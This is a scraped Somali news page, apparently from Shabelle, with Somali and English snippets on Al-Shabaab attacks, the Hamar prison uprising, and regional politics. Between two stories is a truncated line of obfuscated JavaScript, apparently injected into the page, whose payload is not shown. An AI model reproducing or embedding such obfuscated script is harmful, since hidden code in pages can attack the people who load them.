Xubno katirsan Al-Shabaab oo lagu dilay dalka Kenya
MANDHEERA - Ciidamada ammaanka Kenya ee qaabilsan howlgalada xadka Soomaaliya ayaa Jimcihii 12-kii July toogasho ku dilay afar ka mid ah Al-Shabaab, waxayna ka soo heleen keyd hub ah oo ku yaalla meesha uu howlgalka ka dhacay oo ah Banisa oo ku dhaw degmada Mandheera.
Saraakiisha Ciidamada amaanka ayaa helay xog sirdoon, waxaana ay sigaar ah uga sifeeyeen kooxda Al-Shabaab ee ku...
Maxay ka wada-hadleen madaxweyne Saciid Deni iyo James Sawan? + Sawirro
GAROOWE (SMN) - Madaxweynaha Puntland Mudane Siciid Cabdullaahi Deni, oo uu weheliyo Madaxweyne Ku-xigeenka Dowladda Mudane Ilyaas Cismaan Lugatoor, ayaa Qasriga Madaxtooyada ku qaabilay Ergayga cusub ee Qaramada Midoobey usoo magacowday Soomaaliya Ambassador James Swan.
Kulanka ayaa looga hadlay guud ahaan arrimaha Siyaasadda Soomaaliya iyo doorka Puntland ee Dowlad dhiska Soomaaliya, Sidoo kale waxaa kulanka looga hadlay Arrimaha Puntland sida...
Somali Security Forces End Prison Attack, Kill Five Al-Shabaab Inmates
MOGADISHU, Somalia - In a dramatic turn of events at Hamar Central Prison in Somalia, the Correctional Forces successfully ended a violent uprising that erupted within the facility.
The incident unfolded when five inmates, identified as members of the notorious Al-Shabaab terrorist group, attempted to break out by force.
The Department of Corrections swiftly responded to the crisis, neutralizing the threat...
Xildhibaanada BJFS oo maanta ka dooday hindise sharciyeedyo muhiim ah
MUQDISHO (SMN) - Xildhibaanada golaha shacabka ee Baarlamaanka Federaalka Soomaaliya oo maanta kulan ku yeeshay magaalada Muqdisho ayaa ka dooday dhismaha hay’adaha madaxa bannaan ee aan miisaaniyadda lahayn.
Kulanka oo uu shir gudooomiyay guddoomiyaha golaha shacabka Sheekh Aadan Maxamed Nuur ( Madoobe), ayaa sidoo kale, waxaa looga hadlayaa hindise-sharciyeedyada kala ah maalgashiga iyo shaqada Soomaaliyeed.
function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function...
Ehelka Sayid Cali Macalin oo ka hadlay xaaladda uu ku sugan yahay wiilkooda
MUQDISHO (SMN) - Eehellada Sayid Cali Macallin Daa'uud oo xukumay dil toogasho ah ayaa ka hadlay xaaladda wiilkooda, kadib markii weerarkii maanta lagu qaaday xabsiga dhexe.
Nuur Xirsi oo ah adeerka Sayid Cali, isla markaana uu warramay Shabelle ayaa sheegay in wiilkooda uu lasoo xiriiray marka dagaalka bilowday, uuna nabad qabo.
"Wiilka annaga waa nasoo wacay markii ay xabadda bilaaatay ayuu...
Wararkii ugu dambeeyay weerarka xabsiga dhexe ee Xamar + Khasaaraha
MUQDISHO (SMN) - Ciidamada ammaanka ee dowladda Soomaaliya ayaa ugu dambeyn soo afjaray weerarkii xabsiga dhexe ee Xamar, kadib howlgal culus oo saacado qaatay.
Weerarka ayaa waxaa soo abaabulay xubno ku eedeysnaa Al-Shabaabnimo, kuwaas oo loo dusiyay hub iyo bambaanooyin, ayaga oo sidaas kula dagaalamay ciidamada ammaanka.
Dhammaan ragga maxaabiista ah ee weerarka abaabulay ayaa la toogtay, kuwaas oo tiradoodu ay...
Egypt Vows Unwavering Support for Somalia’s Unity and Independence
MOGADISHU, Somalia - Egypt's Minister of Foreign Affairs, Mr. Badar Abdul Aati, expressed his country's full support for Somalia's unity and independence. The visit marked a significant moment in bilateral relations, underscored by the inauguration of a direct flight line between the two nations.
Addressing a press conference, Minister Abdul Aati conveyed the greetings of Egyptian President Fatah Al-Sisi to...
Kenyan forces kill four militants, deal major blow to Al-Shabaab in border operation
MANDERA, Kenya - Kenyan security forces have killed four Al-Shabaab militants and seized a substantial weapons cache near the Somalia border in a significant counter-terrorism operation, security officials have said.
The intelligence-led mission, carried out by a Multi-Agency Security Team in Banisa Sub-County, Mandera, marks another crucial victory in Kenya's ongoing war against terrorism and underscores the country's increasingly sophisticated...
BREAKING: Gunfire Erupts at Hamar Central Prison as Inmates Take Up Arms
MOGADISHU, Somalia - In a shocking turn of events, Hamar Central Prison in Somalia has descended into chaos as reports of gunshots and explosions have been heard from within the facility.
It is alleged that inmates affiliated with the Al-Shabaab (AS) group have managed to obtain firearms and explosives, leading to a violent confrontation with prison guards.
Eyewitnesses and sources within...
Daawo: Jubbaland oo amniga degmada Luuq ku wareejisay ciidanka Itoobiya
LUUQ (SMN) - Dowlad goboleedka Jubbaland ayaa si toos ah amniga degmada Luuq ugu wareejisay ciidamada Itoobiya ee qaybta ka ah howlgalka ATMIS, kuna sugan gobolka Gedo.
Madaxweyne ku xigeenka koowaad ee Jubbaland Mudane Maxamuud Sayid Aadan oo haatan ku sugan degmada Luuq ayaa la kulmay saraakiisha ciidanka Itoobiya, isaga oo kala hadlay amniga degmada iyo dagaalka ka dhanka ah...










